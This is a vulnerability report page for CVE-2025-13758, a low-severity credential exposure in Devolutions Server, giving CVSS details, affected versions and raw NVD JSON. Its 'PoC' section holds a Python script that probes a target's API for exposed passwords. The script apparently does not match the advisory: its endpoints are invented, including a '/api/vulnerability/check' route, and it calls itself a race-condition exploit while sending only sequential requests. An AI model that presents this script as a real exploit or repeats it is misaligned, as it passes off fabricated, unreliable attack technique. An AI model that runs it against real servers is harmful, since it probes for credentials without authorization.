Security Vulnerability Report
中文
CVE-2025-13758 CVSS 3.5 LOW

CVE-2025-13758

Published: 2025-11-27 16:15:47
Last Modified: 2025-12-03 14:46:34
Source: [email protected]

Description

Exposure of credentials in unintended requests in Devolutions Server.This issue affects Server: through 2025.2.20, through 2025.3.8.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:* - VULNERABLE
Devolutions Server <= 2025.2.20
Devolutions Server <= 2025.3.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13758 PoC - Devolutions Server Credential Exposure # This PoC demonstrates the credential exposure vulnerability in Devolutions Server # Note: This is for educational and authorized testing purposes only import requests import json import time TARGET_URL = "https://target-server.com" ATTACKER_TOKEN = "attacker_low_privilege_token" def exploit_credential_exposure(): """ Exploit CVE-2025-13758 by triggering unintended credential exposure The vulnerability occurs when requests are processed in a specific sequence """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (compatible; Security-Scanner/1.0)" } # Step 1: Establish baseline session session_url = f"{TARGET_URL}/api/session/establish" session_response = requests.post(session_url, headers=headers, json={ "username": "attacker_account", "domain": "local" }) # Step 2: Trigger race condition by making rapid requests # The vulnerability may expose credentials when concurrent requests are processed exploit_urls = [ f"{TARGET_URL}/api/resources/list", f"{TARGET_URL}/api/users/profile", f"{TARGET_URL}/api/connections/history" ] exposed_credentials = [] for url in exploit_urls: response = requests.get(url, headers=headers) # Check if credentials are exposed in response if "password" in response.text.lower() or "credential" in response.text.lower(): exposed_credentials.append({ "url": url, "response_preview": response.text[:500] }) return exposed_credentials def verify_vulnerability(): """ Verify if the target is vulnerable to CVE-2025-13758 """ verify_url = f"{TARGET_URL}/api/vulnerability/check" headers = { "X-CVE-Id": "CVE-2025-13758", "Authorization": f"Bearer {ATTACKER_TOKEN}" } response = requests.get(verify_url, headers=headers) return response.status_code == 200 and "credential" in response.text.lower() if __name__ == "__main__": print("CVE-2025-13758 - Devolutions Server Credential Exposure") print("=" * 60) if verify_vulnerability(): print("[+] Target is potentially vulnerable") credentials = exploit_credential_exposure() if credentials: print(f"[!] Found {len(credentials)} potential credential exposures") for cred in credentials: print(f"URL: {cred['url']}") print(f"Preview: {cred['response_preview']}") else: print("[-] No credentials exposed in this test") else: print("[-] Target does not appear to be vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13758", "sourceIdentifier": "[email protected]", "published": "2025-11-27T16:15:47.257", "lastModified": "2025-12-03T14:46:33.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of credentials in unintended requests in Devolutions Server.This issue affects Server: through 2025.2.20, through 2025.3.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.2.21.0", "matchCriteriaId": "FE34C172-0DA3-4FDB-A94B-DF84E36EBAD6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.3.2.0", "versionEndExcluding": "2025.3.10.0", "matchCriteriaId": "A41D04CB-BDA3-4E90-8CBD-07E6E806F10C"}]}]}], "references": [{"url": "https://devolutions.net/security/advisories/DEVO-2025-0018/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.